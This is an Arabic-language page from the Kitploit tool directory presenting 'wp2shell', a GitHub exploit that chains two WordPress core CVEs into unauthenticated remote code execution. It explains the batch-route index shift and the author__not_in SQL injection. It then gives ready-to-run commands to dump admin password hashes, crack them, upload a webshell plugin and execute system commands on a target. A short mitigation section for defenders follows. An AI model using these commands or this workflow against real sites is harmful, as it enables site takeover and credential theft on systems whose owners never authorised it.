Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp2shell-Wordpress-TOWN — يتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة (RCE) في نواة ووردبريس (WordPress Core) للمهاجمين تنفيذ تعليمات برمجية عشوائية دون تسجيل الدخول عبر الربط بين CVE-2026-63030 وCVE-2026-60137، مما قد يؤدي إلى اختراق كامل للموقع. | Kitploit
أدوات/GitHubGitHub/lucifer0xf/wp2shell-wordpress-town
ماسحات الثغرات الأمنيةتحليل الكودالاستغلالأمن الويبCTFالتعلم والتعليم
GitHublucifer0xf/wp2shell-wordpress-town

wp2shell-Wordpress-TOWN

يتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة (RCE) في نواة ووردبريس (WordPress Core) للمهاجمين تنفيذ تعليمات برمجية عشوائية دون تسجيل الدخول عبر الربط بين CVE-2026-63030 وCVE-2026-60137، مما قد يؤدي إلى اختراق كامل للموقع.

عرض المستودع
2110منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

wp2shell بواسطة: lucifer0xf

Banner

تنفيذ التعليمات البرمجية عن بُعد دون مصادقة لنواة ووردبريس — إثبات مفهوم (CVE-2026-63030 + CVE-2026-60137)

wp2shell استغلال لسلسلة ثغرات حرجة في نواة ووردبريس. يجمع بين خلل الالتباس في مسار الدفعات بواجهة REST API وبين حقن SQL في WP_Query لتحقيق تنفيذ تعليمات برمجية عن بُعد دون مصادقة على تثبيتات ووردبريس القابلة للاستغلال.

التفاصيلالمعلومات
CVEsCVE-2026-63030 (الالتباس في مسار دفعات REST) + CVE-2026-60137 (حقن SQL عبر author__not_in)
الإصدارات المتأثرةووردبريس 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
تم الترقيع6.9.5, 7.0.2
المصادقة المطلوبةلا شيء — بدون مصادقة
CVSSحرجة (سلسلة RCE)
اكتشفهاAdam Kues (Assetnote / Searchlight Cyber)
التبعياتPython 3.8+ — المكتبة القياسية فقط

كيف يعمل

يستغل هذا الاستغلال ثغرتين في نواة ووردبريس:

  1. CVE-2026-60137 — حقن SQL – عندما يتم تمرير author__not_in كـنص بدلاً من مصفوفة، يتجاوز ووردبريس حارس التنظيف is_array() ويُدرج القيمة الخام في جملة SQL من نوع NOT IN (...).

  2. CVE-2026-63030 — الالتباس في مسار الدفعات – ينشئ نقطة النهاية /wp-json/batch/v1 مصفوفتين متوازيتين $matches و$validation. يتم إلحاق طلب فرعي غير صالح بـ$validation ولكن ليس بـ$matches، مما يسبب إزاحة فهرس بمقدار +1. يتم إرسال الطلب الفرعي i مع معالج الطلب الفرعي i+1.

عند دمجهما معًا: طلب POST /wp/v2/posts يحمل طلبًا داخليًا GET /wp/v2/users يحتوي على نص author_exclude يتجاوز كلاً من قائمة الأساليب المسموح بها وتنظيف الإدخال. يصل النص إلى WP_Query باسم author__not_in ويتم إدراجه في SQL — مما يمنحك حقن SQL أعمى دون مصادقة.

من هناك، يمكن للأداة:

  • استخراج تجزئة كلمة مرور المسؤول
  • المصادقة كمسؤول (بمجرد كسر التجزئة)
  • رفع إضافة خبيثة
  • تنفيذ أوامر نظام عشوائية

الميزات

الميزةالوصف
التحقق من الثغرةفحص آمن بتأخير زمني — لا يقرأ أي بيانات ولا يغيّر شيئًا
استخراج البياناتحقن SQL أعمى مع تحسين البحث الثنائي لاستخراج فعّال
تفريغ تجزئات المستخدميناستخراج تجزئات user_login وuser_pass من wp_users
تنفيذ التعليمات البرمجية عن بُعدالمصادقة كمسؤول، رفع إضافة ويب شيل، تنفيذ الأوامر
صدفة تفاعليةجلسة تنفيذ أوامر مستمرة
مخرجات ملونةتغذية بصرية واضحة لنتائج الفحص
بدون تبعياتيستخدم مكتبة بايثون القياسية فقط

التثبيت

root@kitploit:~
git clone https://github.com/lucifer0xf/wp2shell-Wordpress-TOWN.git
cd wp2shell-Wordpress-TOWN
chmod +x wp2shell.py

هذا كل شيء. لا حاجة لأي حزم خارجية.


الاستخدام

root@kitploit:~
./wp2shell.py <url> [command] [options]

الوضع التفاعلي (قائم على القوائم)

root@kitploit:~
./wp2shell.py http://target.com

يطلق قائمة تفاعلية تتوفر فيها جميع الوظائف عبر خيارات مرقمة.

الأوامر

check — تأكيد الثغرة (آمن)

ينفذ فحص تأخير زمني لتأكيد قابلية الاستغلال. لا يقرأ أي بيانات ولا يغيّر شيئًا.

root@kitploit:~
./wp2shell.py http://target.com check

read — استخراج البيانات (حقن SQL أعمى)

يستخرج المعلومات من قاعدة البيانات باستخدام حقن SQL أعمى قائم على الوقت.

root@kitploit:~
# Server fingerprint (version, database, user)
./wp2shell.py http://target.com read

# Extract user logins and password hashes
./wp2shell.py http://target.com read --users

# Extract database name
./wp2shell.py http://target.com read --database

# Extract MySQL version
./wp2shell.py http://target.com read --version

# Custom SQL query
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — تنفيذ التعليمات البرمجية عن بُعد

يتطلب بيانات اعتماد مسؤول صالحة. يمكن لحقن SQL استعادة تجزئة كلمة المرور، لكن يجب عليك توفير كلمة المرور النصية المستعادة.

root@kitploit:~
# Execute a single command
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Execute a single command (short form)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

الخيارات

الخيارالوصف
--usersاستخراج user_login وuser_pass من wp_users
--databaseاستخراج اسم قاعدة البيانات الحالية
--versionاستخراج إصدار MySQL
--query "SQL"تنفيذ استعلام SQL مخصص (استخراج أعمى)
--user USERاسم مستخدم المسؤول لـ RCE
--password PASSكلمة مرور المسؤول لـ RCE (نصية، مستعادة عبر SQLi)
--cmd CMDالأمر المراد تنفيذه عبر الويب شيل

مثال لسير العمل

root@kitploit:~
# 1. Check if the target is vulnerable
./wp2shell.py https://example.com check

# 2. Extract admin password hashes
./wp2shell.py https://example.com read --users

# 3. Crack the hash offline (using hashcat, john, etc.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Execute a command with the recovered password
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

الإصدارات المتأثرة

الفرعالمتأثرالإصلاح
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (حقن SQL فقط، بدون RCE)6.8.6

الإصدارات السابقة لـ 6.9.0 ليست متأثرة بسلسلة RCE الكاملة.


الكشف والتخفيف

للمدافعين:

  • قم بالتحديث إلى 6.9.5 أو 7.0.2 أو أحدث فورًا
  • عملاء Cloudflare WAF محميون تلقائيًا
  • عملاء Wordfence لديهم قواعد جدار حماية
  • راقب طلبات POST /wp-json/batch/v1 ذات أجسام requests المتداخلة
  • لا يعني ظهور 404 على مسار الدفعات دائمًا أنه "تم الترقيع" — فقد يعني أيضًا أن WAF/CDN يحظر وصول REST API المجهول

إخلاء المسؤولية القانوني

هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط.


الاعتمادات

  • الاكتشاف: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (حقن SQL): TF1T, dtro, haongo
  • CVE-2026-63030 (الالتباس في مسار الدفعات): Adam Kues
تنزيل الأداة